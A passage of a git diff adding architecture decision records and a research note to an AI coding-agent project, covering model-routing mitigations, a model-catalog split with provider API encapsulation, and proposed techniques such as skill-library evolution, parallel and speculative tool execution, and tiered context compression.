+If the default profiles are not reviewed regularly, GSD will encode outdated assumptions about which models are "best" at which tasks. + +**Mitigation:** Keep defaults in a single data table (not scattered conditionals). Lint for completeness against the model catalog. User overrides via `modelOverrides` provide immediate escape hatch. Document profiles as heuristic rankings, not benchmarks. + +### 2. Budget logic and capability logic may conflict in user perception + +The highest-scoring model may not be selected because budget pressure constrained the eligible tier. This could look inconsistent if the user doesn't understand the pipeline order. + +**Mitigation:** Pipeline order is explicit and enforced in code: +1. Complexity classification determines tier +2. Budget pressure may downgrade tier +3. Tier-eligible models are filtered (downgrade-only from user ceiling) +4. Capability scoring ranks the eligible set +5. Cost tie-breaks within scoring threshold + +Verbose output shows each step. The user sees "budget pressure: 85%" in the reason string when downgrade occurs. + +### 3. Task-type classification may be too coarse initially + +A unit type like `execute-task` contains many sub-shapes. The initial base vector plus metadata refinement may not distinguish all meaningful cases. + +**Mitigation:** The `computeTaskRequirements()` function is designed for iterative refinement. The existing `TaskMetadata` already captures tags, complexity keywords, file counts, dependency counts, and code block counts. New metadata signals can be added to the existing `extractTaskMetadata()` without changing the scoring function. Routing history provides signal on where refinement is needed. + +### 4. Unknown and custom models may score poorly by default + +Users often bring custom provider IDs, local models, or vendor aliases that will not exist in the built-in profile table. + +**Mitigation:** Unknown models receive uniform scores (50 across all dimensions), making capability scoring a no-op — they compete on cost within their tier, same as today. Users can add capability profiles via `modelOverrides` in `models.json` for models they know well. + +### 5. Extension hook adds API surface + +The `before_model_select` hook creates a contract that extensions may depend on. + +**Mitigation:** The hook has a narrow, well-defined interface. It is additive (existing hooks unchanged). The return type is simple (`{ modelId } | undefined`). Breaking changes would be handled through the same extension API versioning as other hooks. + +## Alternatives Considered + +### A. Keep pure complexity-tier routing + +Rejected because it optimizes cost within a tier but still treats meaningfully different models as interchangeable. The existing `MODEL_CAPABILITY_TIER` table already proves this is a recognized gap — it just stops at three buckets. + +### B. Hardcode task → model mappings + +Rejected because it breaks as soon as the user does not have the expected model. This is appropriate for a closed product with a fixed fleet, not for GSD's user-configured provider model. + +### C. Route only by user-specified per-phase models + +Rejected because it pushes all routing intelligence onto the user and does not adapt to retries, task subtype, or provider heterogeneity. + +### D. Use capability-aware routing only as an extension, never in core + +Not rejected as a starting point, but insufficient as the long-term architecture. Extension prototyping is the recommended first phase. However, coherent preferences, diagnostics, testing, and profile versioning will likely require core integration if the model proves valuable. + +### E. Add `costEfficiency` as a capability dimension + +Rejected because it conflates two concerns. If cost appears in both the scoring function and the budget constraint, the router has two competing cost signals that produce confusing behavior (e.g., a cheap model wins on `costEfficiency` score but then gets filtered out by budget pressure, or vice versa). Cost constrains eligibility; capability determines ranking. + +### F. Use static requirement vectors per unit type (no metadata refinement) + +Rejected because the existing `classifyUnitComplexity()` already proves that unit type alone is too coarse. A `execute-task` for docs vs. a `execute-task` for migration are categorically different. The metadata signals (tags, complexity keywords, file counts) that the classifier already extracts should inform requirement vectors. + +## Appendix: Current Architecture Reference + +For implementors, the current routing pipeline files: + +| File | Role | +|------|------| +| `auto-dispatch.ts` | Rule table that determines unit type + prompt | +| `auto-model-selection.ts` | Orchestrates model selection for each dispatch | +| `complexity-classifier.ts` | Tier classification with task metadata analysis | +| `model-router.ts` | Tier → model resolution with downgrade-only semantics | +| `routing-history.ts` | Adaptive learning from success/failure patterns | +| `preferences-models.ts` | Per-phase model config resolution and fallbacks | +| `register-hooks.ts` | Hook registration including `before_provider_request` | + +The capability scoring additions would primarily touch `model-router.ts` (profiles, scoring function) and `auto-model-selection.ts` (passing metadata to the router, new hook point). diff --git a/docs/ADR-007-model-catalog-split.md b/docs/ADR-007-model-catalog-split.md new file mode 100644 index 000000000..8ed426add --- /dev/null +++ b/docs/ADR-007-model-catalog-split.md @@ -0,0 +1,285 @@ +# ADR-007: Model Catalog Split and Provider API Encapsulation + +**Status:** Proposed +**Date:** 2026-04-03 +**Deciders:** Jeremy McSpadden +**Related:** ADR-004 (capability-aware model routing), [ADR-005](https://github.com/gsd-build/gsd-2/issues/2790), [ADR-006](https://github.com/gsd-build/gsd-2/issues/2995), `packages/pi-ai/src/providers/`, `packages/pi-ai/src/models.ts` + +## Context + +The model/provider system in `pi-ai` has two structural problems worth fixing — but the system is **not fundamentally broken**. The heavy lifting (lazy SDK imports, registry-based dispatch, extension-based registration) is already well-designed. This ADR targets the two areas where the current design creates real friction without proposing unnecessary runtime changes. + +### Current Architecture + +``` +stream.ts + └─ import "./providers/register-builtins.js" ← side-effect import at load time + ├─ import anthropic.ts (6.8 KB) + ├─ import anthropic-vertex.ts (3.9 KB) + ├─ import openai-completions.ts (26 KB) + ├─ import openai-responses.ts (6.4 KB) + ├─ import openai-codex-responses.ts (29 KB) + ├─ import azure-openai-responses.ts (7.8 KB) + ├─ import google.ts (13.6 KB) + ├─ import google-vertex.ts (14.5 KB) + ├─ import google-gemini-cli.ts (30 KB) + ├─ import mistral.ts (18.9 KB) + └─ amazon-bedrock.ts (24 KB) ← only lazy-loaded provider + +models.ts + └─ import models.generated.ts ← 13,848 lines, ALL providers, loaded at init + └─ import models.custom.ts ← 197 lines, additional providers +``` + +### What Already Works Well + +1. **SDK lazy loading.** Every provider file uses `async function getXxxClass()` with a cached dynamic `import()`. The heavy npm packages (`@anthropic-ai/sdk`, `openai`, `@google/genai`, `@aws-sdk/*`, `@mistralai/*`) are only loaded on first API call. This is where the real startup cost would be — and it's already handled. + +2. **Registry-based dispatch.** `api-registry.ts` cleanly maps API types to stream functions. Callers use `stream(model, context)` and the registry routes to the right provider. This pattern is sound. + +3. **Extension registration.** Ollama and Claude Code CLI register via `registerApiProvider()` at runtime. This extensibility point works correctly. + +4. **Provider implementation code loading (~200KB total).** While all providers load eagerly, V8 parses local `.js` files in single-digit milliseconds each. The total parse cost for all provider files is ~10-30ms — not a user-visible bottleneck on a CLI that's about to make a multi-second API call anyway. + +### What's Actually Worth Fixing + +#### Problem 1: Monolithic model catalog — developer experience, not runtime + +`models.generated.ts` is **13,848 lines in a single file**. This creates real friction: + +- **PR reviews are painful.** When the generation script runs, the diff is a wall of changes across unrelated providers. Reviewers can't tell what actually changed for a specific provider. +- **Navigation is slow.** Finding a specific model requires scrolling or searching through thousands of lines of static object literals. +- **Merge conflicts are frequent.** Any two PRs that touch model generation will conflict on the same monolithic file. +- **Git blame is useless.** Every line was "last changed" by the generation script, obscuring the history of individual provider additions. + +The runtime cost of loading all model definitions is negligible — a Map of ~200 model objects is maybe 50-100KB of heap. The problem is purely about code organization and developer workflow. + +#### Problem 2: Barrel export leaks provider internals — API design + +`packages/pi-ai/src/index.ts` re-exports every provider module's internals: + +```typescript +export * from "./providers/anthropic.js"; +export * from "./providers/google.js"; +export * from "./providers/google-gemini-cli.js"; +export * from "./providers/google-vertex.js"; +export * from "./providers/mistral.js"; +export * from "./providers/openai-completions.js"; +export * from "./providers/openai-responses.js"; +// ... etc +``` + +This is a public API problem: + +- **Consumers can bypass the registry.** Any code that `import { streamAnthropic } from "pi-ai"` has a direct dependency on an implementation detail that should be internal. +- **Refactoring is blocked.** Renaming a function inside a provider file is a breaking change because it's re-exported from the package root. +- **API surface is unnecessarily large.** The public API should be `stream()`, `streamSimple()`, `registerApiProvider()`, model utilities, and types. Provider-specific stream functions are implementation details. + +### What Is NOT Worth Changing + +**Lazy provider loading (converting `register-builtins.ts` to async on-demand loading).** This was considered and rejected because: + +1. **The SDKs are already lazy.** The heavy cost is handled. Provider implementation code (~200KB of local `.js`) parses in ~10-30ms total. +2. **Async resolution adds complexity to the hot path.** `stream.ts` currently does a synchronous `Map.get()`. Making `resolveApiProvider` async adds a microtask hop to every API call — not just the first. Small but measurable, and for no user-visible gain. +3. **High blast radius, low payoff.** Touching `stream.ts`, `api-registry.ts`, and the registration lifecycle simultaneously risks regressions in the core streaming path for an optimization that wouldn't show up in profiling. +4. **Bedrock's lazy loading is a special case, not a template.** It exists because `@aws-sdk/client-bedrock-runtime` is uniquely massive. Generalizing this pattern to providers where the SDK is already lazy-imported doesn't compound the benefit. + +## Decision + +**Make two targeted improvements to code organization and API hygiene. Do not change runtime loading behavior.** + +### Change 1: Split `models.generated.ts` into per-provider files + +Replace the monolithic 13,848-line generated file with per-provider files: + +``` +packages/pi-ai/src/models/ + ├── index.ts ← re-exports combined registry, same public API + ├── generated/ + │ ├── anthropic.ts ← Anthropic model definitions + │ ├── openai.ts ← OpenAI model definitions + │ ├── google.ts ← Google model definitions + │ ├── mistral.ts ← Mistral model definitions + │ ├── amazon-bedrock.ts ← Bedrock model definitions + │ ├── groq.ts ← Groq model definitions + │ ├── xai.ts ← xAI model definitions + │ ├── cerebras.ts ← Cerebras model definitions + │ ├── openrouter.ts ← OpenRouter model definitions + │ └── ... ← one file per provider in the catalog + ├── custom.ts ← replaces models.custom.ts (unchanged content) + └── capability-patches.ts ← CAPABILITY_PATCHES extracted for clarity +``` + +**`models/index.ts` keeps the exact same synchronous public API:** + +```typescript +// models/index.ts +// GSD-2 — Model registry (split by provider for maintainability) + +import { ANTHROPIC_MODELS } from "./generated/anthropic.js"; +import { OPENAI_MODELS } from "./generated/openai.js"; +import { GOOGLE_MODELS } from "./generated/google.js"; +// ... one import per provider + +import { CUSTOM_MODELS } from "./custom.js"; +import { CAPABILITY_PATCHES, applyCapabilityPatches } from "./capability-patches.js"; +import type { Api, KnownProvider, Model, Usage } from "../types.js"; + +// Combine all generated models into single registry — same as today +const MODELS = { + ...ANTHROPIC_MODELS, + ...OPENAI_MODELS, + ...GOOGLE_MODELS, + // ... +}; + +// Rest of the file is identical to current models.ts: +// modelRegistry Map construction, capability patch application, +// getModel(), getProviders(), getModels(), calculateCost(), +// supportsXhigh(), modelsAreEqual() +``` + +**Key constraint: loading stays synchronous and eager.** All model files are statically imported. The Map is built at module init exactly as today. No async, no lazy loading, no runtime behavior change. This is purely a file organization change. + +**Update `generate-models.ts`** to emit one file per provider instead of a single `models.generated.ts`. The script already groups models by provider internally — it just needs to write separate files instead of one. + +#### Why this matters + +| Before | After | +|--------|-------| +| PR diffs show 13K-line file changes | PR diffs scoped to the provider that changed | +| Merge conflicts on any concurrent model update | Conflicts only when same provider is touched | +| `git blame` shows "regenerate models" for every line | `git blame` shows per-provider history | +| Finding a model = search through 13K lines | Finding a model = open the provider file | +| One reviewer must understand all providers | Reviewers only need context for affected provider | + +### Change 2: Stop barrel-exporting provider internals + +**Update `packages/pi-ai/src/index.ts`:** + +```typescript +// Before (current — 17 re-exports including all providers): +export * from "./providers/anthropic.js"; +export * from "./providers/azure-openai-responses.js"; +export * from "./providers/google.js"; +export * from "./providers/google-gemini-cli.js"; +export * from "./providers/google-vertex.js"; +export * from "./providers/mistral.js"; +export * from "./providers/openai-completions.js"; +export * from "./providers/openai-responses.js"; +export * from "./providers/register-builtins.js"; +// ... + +// After (clean public API): +export * from "./api-registry.js"; +export * from "./env-api-keys.js"; +export * from "./models/index.js"; +export * from "./providers/register-builtins.js"; // resetApiProviders() is public +export * from "./stream.js"; +export * from "./types.js"; +export * from "./utils/event-stream.js"; +export * from "./utils/json-parse.js"; +export type { OAuthAuthInfo, OAuthCredentials, /* ... */ } from "./utils/oauth/types.js"; +export * from "./utils/overflow.js"; +export * from "./utils/typebox-helpers.js"; +export * from "./utils/repair-tool-json.js"; +export * from "./utils/validation.js"; +``` + +Provider-specific exports (`streamAnthropic`, `streamGoogle`, etc.) are removed from the public API. Any external consumer that imported them directly should use the registry-based `stream()` / `streamSimple()` functions instead — which is how all internal callers already work. + +#### Why this matters + +- **Enforces the registry pattern.** The correct way to call a provider is `stream(model, context)`. Direct provider function imports create fragile coupling. +- **Enables future refactoring.** Provider internal function signatures can change without breaking the package API. Today, renaming `streamAnthropic` would be a semver-breaking change. +- **Reduces API surface.** Consumers see only what they need: `stream`, `streamSimple`, `registerApiProvider`, model utilities, and types. + +### What Does NOT Change + +- **Runtime behavior** — all providers still load eagerly, same as today +- **The `Model` type system** — all types, interfaces, and generics stay the same +- **The `ApiProvider` interface** — providers still implement `{ api, stream, streamSimple }` +- **The `api-registry.ts` registry** — synchronous `Map.get()` dispatch, unchanged +- **`stream.ts`** — no changes to the streaming entry point +- **`register-builtins.ts`** — still eagerly imports and registers all providers (only `resetApiProviders` remains in barrel export) +- **The extension system** — `registerApiProvider()` continues to work for Ollama, Claude Code CLI, etc. +- **`models.json` user config** — custom models, overrides, provider settings are unaffected +- **Model discovery** — discovery adapters are already lazy and independent +- **Model routing** — ADR-004's capability-aware routing is orthogonal + +## Consequences + +### Positive + +1. **Cleaner PRs.** Model catalog changes are scoped to the provider that changed. Reviewers see a 200-line diff in `models/generated/openai.ts` instead of a 13K-line diff in `models.generated.ts`. + +2. **Fewer merge conflicts.** Two PRs that update different providers no longer conflict on the same file. + +3. **Better navigability.** Developers can jump directly to `models/generated/anthropic.ts` to see Anthropic's model definitions instead of searching through a monolith. + +4. **Cleaner package API.** `pi-ai` exports only what consumers need. Provider internals are properly encapsulated. + +5. **Future-proofs refactoring.** Provider implementation details can evolve without breaking the public API contract. + +6. **Zero runtime risk.** No changes to loading, registration, streaming, or dispatch. The refactor is purely structural. + +### Negative + +1. **More files.** Instead of 1 generated file + 1 custom file, we'll have ~15-20 generated files. Marginal complexity increase, but each file is focused and small. + +2. **Generation script update.** `generate-models.ts` needs to write per-provider files. The script already groups by provider, so this is straightforward but requires testing. + +3. **Import audit for barrel export change.** Any code that directly imports `streamAnthropic` (etc.) from `pi-ai` needs to be updated. Based on research, the main consumer is `register-builtins.ts` itself, which imports providers directly (not through the barrel). External usage should be minimal. + +## Alternatives Considered + +### 1. Full lazy provider loading (original ADR-005 proposal) + +Make all providers load on-demand via async dynamic imports, generalizing the Bedrock pattern. **Rejected** because: +- SDK imports are already lazy — the heavy cost is handled +- Provider implementation parsing is ~10-30ms total — not a bottleneck +- Adds async complexity to the synchronous stream dispatch hot path +- High migration effort and regression risk for unmeasurable performance gain + +### 2. Plugin architecture with separate npm packages + +Move each provider to its own package (`@gsd/provider-anthropic`, etc.). Maximum isolation but dramatically more complex build/release/versioning. Overkill for a monorepo where all providers ship together. + +### 3. Do nothing + +The current architecture works. This is a valid choice. The split is justified by the developer experience friction (13K-line file, merge conflicts, unusable git blame) and the API hygiene issue (leaking provider internals), not by a runtime problem. If the team is not experiencing these friction points, deferring is reasonable. + +## Implementation Plan + +### Wave 1: Split Model Catalog (Low-Medium Risk) +1. Update `generate-models.ts` to emit per-provider files into `models/generated/` +2. Create `models/index.ts` that imports all per-provider files and builds the same registry +3. Extract `CAPABILITY_PATCHES` into `models/capability-patches.ts` +4. Move `models.custom.ts` to `models/custom.ts` +5. Update imports in `models.ts` (or replace it with the new `models/index.ts`) +6. Verify `npm run build` and `npm run test` pass +7. Delete `models.generated.ts` and `models.custom.ts` + +### Wave 2: Clean Up Barrel Export (Low Risk) +1. Remove provider re-exports from `index.ts` +2. Grep for direct provider imports from `"pi-ai"` across the codebase +3. Migrate any found usages to use `stream()` / `streamSimple()` through the registry +4. Verify build and tests + +### Wave 3: Validate +1. Run full test suite +2. Verify extension registration (Ollama, Claude Code CLI) still works +3. Verify `resetApiProviders()` test helper still works +4. Spot-check a few providers end-to-end + +## References + +- Current model catalog: `packages/pi-ai/src/models.generated.ts` (13,848 lines) +- Current barrel export: `packages/pi-ai/src/index.ts` +- Model registry: `packages/pi-ai/src/models.ts` +- API provider registry: `packages/pi-ai/src/api-registry.ts` +- Eager registration: `packages/pi-ai/src/providers/register-builtins.ts` +- Stream dispatch: `packages/pi-ai/src/stream.ts` +- Generation script: `packages/pi-ai/scripts/generate-models.ts` +- Extension registration: `packages/pi-coding-agent/src/core/model-registry.ts` +- ADR-004: `docs/ADR-004-capability-aware-model-routing.md` diff --git a/docs/FRONTIER-TECHNIQUES.md b/docs/FRONTIER-TECHNIQUES.md new file mode 100644 index 000000000..6aa5ad59a --- /dev/null +++ b/docs/FRONTIER-TECHNIQUES.md @@ -0,0 +1,741 @@ +# Frontier Techniques for GSD-2 + +Research into cutting-edge AI agent techniques that map directly to GSD-2's architecture, ranked by impact and feasibility. + +**Date:** 2026-03-25 +**Status:** Research / Pre-RFC + +--- + +## Table of Contents + +- [Executive Summary](#executive-summary) +- [1. Skill Library Evolution](#1-skill-library-evolution) +- [2. DAG-Based Parallel Tool Execution](#2-dag-based-parallel-tool-execution) +- [3. Speculative Tool Execution](#3-speculative-tool-execution) +- [4. Semantic Context Compression](#4-semantic-context-compression) +- [5. Cross-Session Learning Graph](#5-cross-session-learning-graph) +- [6. MCTS-Based Planning](#6-mcts-based-planning) +- [Priority Matrix](#priority-matrix) +- [Sources & References](#sources--references) + +--- + +## Executive Summary + +GSD-2 is a multi-layered, event-driven agent platform with strong extensibility primitives: a skill system, file-based memory, session branching, compaction, and 16+ extension lifecycle hooks. These existing primitives create natural integration points for six frontier techniques that could fundamentally change how GSD operates. + +The techniques fall into three categories: + +| Category | Techniques | Theme | +|----------|-----------|-------| +| **Self-Improvement** | Skill Library Evolution, Cross-Session Learning Graph | GSD gets better the more you use it | +| **Performance** | DAG Tool Execution, Speculative Tool Execution | GSD gets faster per turn | +| **Intelligence** | Semantic Context Compression, MCTS Planning | GSD reasons better with the same context budget | + +--- + +## 1. Skill Library Evolution + +**Category:** Self-Improvement +**Impact:** Massive | **Effort:** Medium | **Priority:** #1 + +### What It Is + +Inspired by [SkillRL](https://arxiv.org/abs/2602.08234) (ICLR 2026), this technique transforms GSD's skill system from static instruction files into a self-improving knowledge base. Instead of skills being written once and updated manually, they evolve based on execution outcomes. + +SkillRL demonstrates that agents with learned skill libraries outperform baselines by 15.3%+ across task benchmarks, with 10-20% token compression compared to raw trajectory storage. + +### How It Works + +``` +┌─────────────────────────────────────────────────────────┐ +│ EXECUTION LOOP │ +│ │ +│ 1. Skill invoked → agent executes task │ +│ 2. Outcome captured (success/failure + trajectory) │ +│ 3. Trajectory distilled: │ +│ ├─ Success → strategic pattern extracted │ +│ └─ Failure → anti-pattern + lesson recorded │ +│ 4. Skill file updated with versioned improvement │ +│ 5. Next invocation benefits from accumulated learnings │ +│ │ +└─────────────────────────────────────────────────────────┘ +``` + +**Two types of learned knowledge:** + +| Type | Description | Example | +|------|-------------|---------| +| **General Skills** | Universal strategic guidance applicable across tasks | "When editing TypeScript files, always check for type errors via LSP before committing" | +| **Task-Specific Skills** | Category-level heuristics for specific skill domains | "The `fix-issue` skill should check CI status before opening a PR, not after" | + +### Why It Fits GSD-2 + +GSD already has every primitive needed: + +- **Skill files** (`~/.claude/skills/`, `.claude/skills/`) — the storage layer exists +- **Extension hooks** (`turn_end`, `agent_end`) — outcome capture points exist +- **Memory system** (MEMORY.md + individual files) — persistence exists +- **`/improve-skill` and `/heal-skill` commands** — manual versions of this loop already exist + +The gap is automation: connecting execution outcomes back to skill files without human intervention. + +### Integration Points + +| GSD Component | Role in Integration | +|---------------|-------------------| +| `agent-session.ts` → `turn_end` event | Captures execution outcome (success/failure signals) | +| Extension hook: `agent_end` | Triggers trajectory distillation | +| Skill file system | Receives versioned updates with learned patterns | +| `compaction.ts` | Provides trajectory data from the session for distillation | + +### Architecture + +``` +User invokes skill + │ + ▼ +┌──────────────┐ ┌──────────────────┐ +│ AgentSession │────▶│ Skill Executor │ +│ (turn_end) │ │ (tracks outcome) │ +└──────────────┘ └────────┬─────────┘ + │ + ┌─────────▼──────────┐ + │ Outcome Classifier │ + │ (success/failure/ │ + │ partial) │ + └─────────┬──────────┘ + │ + ┌───────────────┼───────────────┐ + ▼ ▼ ▼ + ┌────────────┐ ┌──────────────┐ ┌───────────┐ + │ Success │ │ Failure │ │ Partial │ + │ Distiller │ │ Distiller │ │ Analyzer │ + └─────┬──────┘ └──────┬───────┘ └─────┬─────┘ + │ │ │ + ▼ ▼ ▼ + ┌─────────────────────────────────────────────┐ + │ Skill File Updater │ + │ • Appends learned pattern to skill │ + │ • Versions the update │ + │ • Preserves original skill intent │ + └─────────────────────────────────────────────┘ +``` + +### Open Questions + +- **Drift prevention:** How to prevent accumulated learnings from overwhelming the original skill intent? +- **Conflict resolution:** What happens when a lesson from one session contradicts another? +- **Quality gate:** Should updates require a validation pass before being written? + +--- + +## 2. DAG-Based Parallel Tool Execution + +**Category:** Performance +**Impact:** High | **Effort:** Medium | **Priority:** #2 + +### What It Is + +The [LLM Compiler pattern](https://arxiv.org/pdf/2312.04511) (ICML 2024) treats multi-tool workflows like a compiler optimization pass. When the model returns multiple tool calls in a single response, instead of executing them sequentially, the system: + +1. Analyzes dependencies between tool calls +2. Constructs a Directed Acyclic Graph (DAG) +3. Executes independent tools in parallel +4. Blocks only on actual data dependencies + +### How It Works + +**Current GSD behavior (sequential):** +``` +Read(auth.ts) ─── 150ms ───▶ result + │ +Read(types.ts) ─── 120ms ──▶ result + │ +Grep("login") ─── 80ms ────▶ result + │ +Read(test.ts) ─── 130ms ───▶ result + │ +Total: ~480ms sequential +``` + +**With DAG execution (parallel):** +``` +Read(auth.ts) ─── 150ms ──▶ result ─┐ +Read(types.ts) ─── 120ms ──▶ result ─┤ +Grep("login") ─── 80ms ───▶ result ─┤── all complete at 150ms +Read(test.ts) ─── 130ms ──▶ result ─┘ + │ +Total: ~150ms (max of parallel set) +``` + +**Dependency analysis rules:** + +| Tool A | Tool B | Dependency? | Reason | +|--------|--------|-------------|--------| +| Read(file) | Read(file) | No | Reads are idempotent | +| Read(file) | Grep(pattern) | No | Independent data sources | +| Read(file) | Edit(file) | Yes | Edit depends on Read content | +| Edit(file) | Edit(file) | Yes | Edits to same file must serialize | +| Bash(cmd) | Bash(cmd) | Maybe | Depends on side effects | +| Write(file) | Read(file) | Yes | Read after write needs write to complete | + +### Why It Fits GSD-2 + +The model already emits multiple `tool_use` blocks in a single response. GSD processes them, but the execution path in `agent-loop.ts` handles them in sequence. The parallelism opportunity is sitting right there. + +**Measured impact estimate:** A typical coding turn involves 3-5 tool calls. With 60% parallelizable (reads, greps, globs), per-turn latency drops by 40-60%. Over a 50-turn session, that's minutes saved. + +### Integration Points + +| GSD Component | Role in Integration | +|---------------|-------------------| +| `agent-loop.ts` tool execution path | Replace sequential execution with DAG scheduler | +| Tool definitions | Annotate tools with side-effect metadata (pure/impure) | +| Extension hooks (`tool_*`) | Must still fire in correct order per dependency chain | + +### Architecture + +``` +Model response with N tool_use blocks + │ + ▼ +┌──────────────────────────────┐ +│ Dependency Analyzer │ +│ • Parse tool calls │ +│ • Identify file overlaps │ +│ • Identify data dependencies │ +│ • Classify: pure vs impure │ +└──────────────┬───────────────┘ + │ + ▼ +┌──────────────────────────────┐ +│ DAG Constructor │ +│ • Nodes = tool calls │ +│ • Edges = dependencies │ +│ • Topological sort │ +└──────────────┬───────────────┘ + │ + ▼ +┌──────────────────────────────┐ +│ Parallel Executor │ +│ • Execute roots immediately │ +│ • On completion, unlock │ +│ dependent nodes │ +│ • Collect all results │ +│ • Return in original order │ +└──────────────────────────────┘ +``` + +### Open Questions + +- **Bash side effects:** How to determine if two Bash commands conflict without executing them? +- **Extension hooks:** Should `tool_start`/`tool_end` events fire in execution order or original order? +- **Error propagation:** If a parallel tool fails, do dependent tools get cancelled or receive the error? + +--- + +## 3. Speculative Tool Execution + +**Category:** Performance +**Impact:** High | **Effort:** Low-Medium | **Priority:** #3 + +### What It Is + +Based on [Speculative Tool Calls research](https://arxiv.org/pdf/2512.15834), this technique predicts which tools the model will request and pre-executes them before the model responds. Correct predictions eliminate the first tool-call round-trip entirely. Wrong predictions are discarded at zero cost beyond compute. + +### How It Works + +``` +┌─────────────────────────────────────────────────────────────┐ +│ User: "fix the bug in auth.ts" │ +│ │ +│ BEFORE model responds: │ +│ Speculator predicts: │ +│ ├─ Read("auth.ts") → pre-executed ✓ │ +│ ├─ Grep("error|bug", "auth") → pre-executed ✓ │ +│ ├─ LSP diagnostics(auth.ts) → pre-executed ✓ │ +│ └─ Read("auth.test.ts") → pre-executed ✓ │ +│ │ +│ Model responds with tool calls: │ +│ ├─ Read("auth.ts") → CACHE HIT (0ms) │ +│ ├─ Read("auth.test.ts") → CACHE HIT (0ms) │ +│ └─ Grep("login", "src/") → cache miss (execute) │ +│ │ +│ Hit rate: 2/3 = 67% │ +│ Latency saved: ~300ms on this turn │ +└─────────────────────────────────────────────────────────────┘ +``` + +**Prediction strategies (simplest to most sophisticated):** + +| Strategy | Description | Expected Hit Rate | +|----------|-------------|-------------------| +| **Keyword extraction** | Parse user prompt for file paths, function names → Read those files | 40-60% | +| **Session history** | Track which tools follow which user prompt patterns | 50-70% | +| **Learned patterns** | Use the skill library evolution data to predict tool sequences | 60-80% | +| **Model pre-query** | Ask a fast/cheap model to predict tool calls | 70-85% | + +### Why It Fits GSD-2 + +The #1 latency bottleneck in GSD is the round-trip: user prompt → model thinks → model requests tool → tool executes → result sent back → model thinks again. Speculative execution attacks the highest-latency step. + +GSD's architecture makes this easy to add: +- `AgentSession.prompt()` already processes user input before sending to the model +- Tool results are already cached in the message array +- The extension system can intercept input and spawn pre-fetches + +### Integration Points + +| GSD Component | Role in Integration | +|---------------|-------------------| +| `AgentSession.prompt()` | Trigger speculation after user input, before model call | +| Tool result cache (new) | Store speculated results keyed by tool+args | +| `agent-loop.ts` tool execution | Check cache before executing; serve cached result on hit | +| Extension hook: `input` | Parse user intent for file paths, patterns | + +### Architecture + +``` +User input arrives + │ + ├──────────────────────────────────────┐ + │ │ + ▼ ▼ +┌───────────────┐ ┌──────────────────┐ +│ Send to LLM │ │ Speculator │ +│ (normal path) │ │ • Extract paths │ +│ │ │ • Predict tools │ +│ ... waiting │ │ • Pre-execute │ +│ for response │ │ • Cache results │ +│ │ └──────────────────┘ +│ │ │ +│ │◀─── model returns ──────────│ +│ │ tool_use blocks │ +└───────┬───────┘ │ + │ │ + ▼ │ +┌───────────────┐ │ +│ Tool Executor │◀──── check cache ───────────┘ +│ • Cache hit? │ +│ → return │ +│ • Cache miss? │ +│ → execute │ +└───────────────┘ +``` + +### Cost Analysis + +| Scenario | Cost | +|----------|------| +| **Correct prediction** | ~0ms latency (result already available). Compute cost: the pre-execution itself (trivial for Read/Grep). | +| **Wrong prediction** | Wasted compute for the pre-executed tool. For Read/Grep/Glob, this is <10ms of I/O. | +| **Partial hit** | Net positive as long as hit rate > 20% (given how cheap misses are). | + +### Open Questions + +- **TTL for cached results:** How long are speculated results valid? File contents can change between speculation and model request. +- **Side effects:** Should only pure tools (Read, Grep, Glob, LSP) be speculatable? +- **Resource limits:** Cap on number of speculative executions per turn to prevent I/O storms? + +--- + +## 4. Semantic Context Compression + +**Category:** Intelligence +**Impact:** High | **Effort:** High | **Priority:** #4 + +### What It Is + +GSD's compaction system uses a char/4 heuristic for token estimation and all-or-nothing LLM summarization for context reduction. Research from [Zylos](https://zylos.ai/research/2026-02-28-ai-agent-context-compression-strategies) and [context engineering literature](https://rlancemartin.github.io/2025/06/23/context_engineering/) shows that embedding-based compression achieves 80-90% token reduction while preserving the ability to selectively recall specific historical context. + +### Current GSD Compaction (Weaknesses Highlighted) + +``` +Messages: [M1, M2, M3, M4, M5, M6, M7, M8, M9, M10] + ▲ +Token budget exceeded │ recent + │ +Current approach: +┌─────────────────────────┬─────────────────────────┐ +│ M1-M6: LLM-summarized │ M7-M10: kept verbatim │ +│ into single blob │ (last ~20k tokens) │ +│ │ │ +│ ⚠ All detail lost │ ✓ Full fidelity │ +│ ⚠ No selective recall │ │ +│ ⚠ char/4 overestimates │ │ +└─────────────────────────┴─────────────────────────┘ +``` + +**Three specific weaknesses:** + +| Weakness | Impact | Current Code Location | +|----------|--------|-----------------------| +| char/4 token estimation | ~25% overestimate → compacts too early → wastes context | `compaction.ts:201-259` | +| All-or-nothing summarization | Loses specific details that may be relevant later | `compaction.ts:327-400` | +| No retrieval from compacted history | Once summarized, detail is gone forever | `compaction-orchestrator.ts` | + +### Proposed: Tiered Memory Architecture + +``` +┌─────────────────────────────────────────────────────────┐ +│ HOT TIER │ +│ Recent turns (last ~20k tokens) │ +│ Full text, full fidelity │ +│ Storage: in-context messages │ +│ Access: always in prompt │ +├─────────────────────────────────────────────────────────┤ +│ WARM TIER │ +│ Older turns (beyond context window) │ +│ Stored as embeddings + compressed text │ +│ Storage: session-local vector index │ +│ Access: retrieved when semantically relevant to │ +│ current turn │ +│ Token cost: only retrieved segments count │ +├─────────────────────────────────────────────────────────┤ +│ COLD TIER │ +│ Ancient turns / previous sessions │ +│ Stored as summaries + metadata │ +│ Storage: disk (existing session files) │ +│ Access: retrieved only on explicit recall │ +│ Token cost: minimal summary headers │ +└─────────────────────────────────────────────────────────┘ +``` + +**How retrieval works per turn:** + +``` +New user prompt arrives + │ + ▼ +┌───────────────────┐ +│ Embed the prompt │ (compute embedding of user's question) +└────────┬──────────┘ + │ + ├──── query warm tier ──▶ top-K relevant historical turns + │ (cosine similarity > threshold) + │ + ├──── always include ──▶ hot tier (recent turns, full text) + │ + ▼ +┌───────────────────┐ +│ Compose context │ +│ = hot + retrieved │ +│ + system prompt │ +└───────────────────┘ +``` + +### Token Estimation Improvement + +Replace char/4 with adaptive estimation: + +| Approach | Accuracy | Cost | +|----------|----------|------| +| **char/4 (current)** | ~75% (overestimates) | Zero | +| **Provider-reported usage** | 100% (for last turn) | Zero (already tracked) | +| **tiktoken/provider tokenizer** | ~98% | ~5ms per message | +| **Hybrid: actual for recent, char/4 for old** | ~95% | Negligible | + +The hybrid approach — use actual token counts from provider responses for recent messages, fall back to char/4 for older messages — is a quick win that requires no new dependencies. + +### Integration Points + +| GSD Component | Role in Integration | +|---------------|-------------------| +| `compaction.ts` | Replace cut-point algorithm with tiered approach | +| `compaction-orchestrator.ts` | Add warm-tier retrieval before model call | +| `agent-session.ts` message building | Inject retrieved warm-tier segments | +| Session persistence layer | Store embeddings alongside session entries | + +### Open Questions + 